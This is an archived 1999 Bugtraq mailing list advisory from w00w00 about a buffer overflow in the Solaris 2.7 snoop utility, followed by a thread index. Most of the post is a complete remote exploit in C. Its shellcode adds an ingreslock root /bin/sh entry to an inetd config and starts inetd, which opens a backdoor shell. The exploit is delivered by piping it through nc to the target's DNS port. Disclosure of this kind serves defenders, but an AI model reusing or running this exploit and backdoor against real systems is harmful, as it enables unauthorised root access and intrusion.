Bugtraq mailing list archives
w00giving #8] Solaris 2.7's snoop
From: aleph1 () UNDERGROUND ORG (Aleph One)
Date: Mon, 6 Dec 1999 22:46:12 -0800
Date: Tue, 7 Dec 1999 04:42:06 +0300 (MSK) From: Matt Conover <shok () cannabis dataforce net> To: news () technotronic com cc: w00w00 () blackops org Subject: [w00giving #8] Solaris 2.7's snoop Message-ID: <Pine.LNX.3.95.991207044002.14801C-100000 () cannabis dataforce net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-news () technotronic com Precedence: bulk [Note: as we promised, our website and technotronic will get this advisory before anything else does. Thanks for participating in technotronic.] w00w00 Security Development (WSD) http://www.w00w00.org/advisories.html Discovered by: K2 (ktwo () ktwo ca) Snoop is a program similar to tcpdump that allows one to watch network traffic. There is a buffer overflow in the snoop program when run in verbose (-v) mode that occurs when a domain name greater than 1024 bytes is logged, because it will overwrite a buffer in print_domain_name. This vulnerability allows remote access to the system with the privileges of the user who ran snoop (usually root, because it requires read privileges on special devices). --------------------------------------------------------------------------- Exploit (by cheez): /* Remote Solaris 2.7 x86 snoop exploit Run with ( ./snp ) | nc -u target_host_network 53 requires target host to be running "snoop -v" Thanks str/horizon for shellcodes (hi plaguez) */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> char shell[] = "\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89" "\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D" "\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89" "\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51" "\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF" "\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39" "\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73" "\x68\x28\x2D\x63\x29 echo w00w00;" "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" >> /tmp/w00;" "/usr/sbin/inetd -s /tmp/w00; /bin/rm -f /tmp/w00"; #define SIZE 2048 #define NOPDEF 349 #define DEFOFF 0 char buffer[SIZE]; const char x86_nop=0x90; long nop=NOPDEF, esp=0x8047344, offset=DEFOFF; int main (int argc, char *argv[]) { int i; if (argc > 1) offset += strtol(argv[1], NULL, 0); if (argc > 2) nop += strtoul(argv[2], NULL, 0); memset(buffer, x86_nop, SIZE); memcpy(buffer+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < SIZE-4; i += 4) *((int *) &buffer[i]) = esp+offset; fprintf(stderr,"0x%x\n", esp+offset); printf("%s", buffer); return 0; } --------------------------------------------------------------------------- Patch: Because Sun Microsystems doesn't include source, we must wait for them to release a patch. --------------------------------------------------------------------------- http://www.roses-labs.com, http://www.napster.com, http://www.technotronic.com, http://www.w00w00.org
Current thread:
- Analysis of Tribe Flood Network, (continued)
- Analysis of Tribe Flood Network Dave Dittrich (Dec 07)
- Re: Analysis of Tribe Flood Network Mixter (Dec 08)
- Re: Analysis of Tribe Flood Network Stefan Laudat (Dec 10)
- Error in System Policies Adam Simms (Dec 10)
- Re: Analysis of Tribe Flood Network Mixter (Dec 11)
- Big problem on linux 2.0 visi0n (Dec 11)
- Re: Big problem on linux 2.0 visi0n (Dec 11)
- Re: Big problem on linux 2.0 Andrea Arcangeli (Dec 14)
- Analysis of Tribe Flood Network Dave Dittrich (Dec 07)
- HP-UX: Security Vulnerability in wu-ftp Aleph One (Dec 13)
- Re: w00giving #8] Solaris 2.7's snoop Shane A. Macaulay (Dec 09)
- Clarification needed on the snoop vuln(s) Alfred Huger (Dec 09)
- Re: FTP denial of service attack Renaud Deraison (Dec 07)
- FTP DoS - PORT and PASV effected. Darren Reed (Dec 07)
- Re: FTP DoS - PORT and PASV effected. Henrik Nordstrom (Dec 09)
- Re: FTP denial of service attack Hugo.van.der.Kooij () CAIW NL (Dec 08)
- Re: FTP denial of service attack Paulo Licio de Geus (Dec 09)